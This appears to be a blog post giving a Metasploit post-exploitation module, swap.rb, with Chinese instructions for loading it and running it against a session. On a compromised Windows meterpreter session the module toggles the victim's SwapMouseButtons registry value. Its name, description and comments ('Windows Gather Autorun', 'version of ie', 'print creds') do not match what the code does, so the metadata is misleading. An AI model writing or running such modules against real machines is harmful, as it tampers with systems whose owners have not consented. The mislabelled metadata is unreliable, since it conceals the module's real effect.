swap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info,
'Name' => "Windows Gather Autorun",
'Description' => %q{
This module will collect autorun program.
},
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['cosmop01tain']
))
end
#
# RAILGUN HELPER FUNCTIONS
#
def is_86
pid = session.sys.process.open.pid
return session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
end
def run
#check for meterpreter and version of ie
if session.type != "meterpreter" and session.platform !~ /win/
print_error("This module only works with Windows Meterpreter sessions")
return 0
end
#get version of ie and check it
ver = registry_getvaldata("HKCU\\Control Panel\\Mouse", "SwapMouseButtons")
print_status("Button Status: #{ver}")
print_status("start to swap...")
if ver=="0"
if registry_setvaldata("HKCU\\Control Panel\\Mouse","SwapMouseButtons", "1", "REG_SZ")
print_good("success")
end
else
if registry_setvaldata("HKCU\\Control Panel\\Mouse","SwapMouseButtons", "0", "REG_SZ")
print_good("success")
end
end
#print creds
print_line("")
end
end
保存到msf post/windows/gather/swap.rb,进入msfconsole之后执行reload_all
加载模块,
使用:use post/windows/gather/swap
set session id
run
2891
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
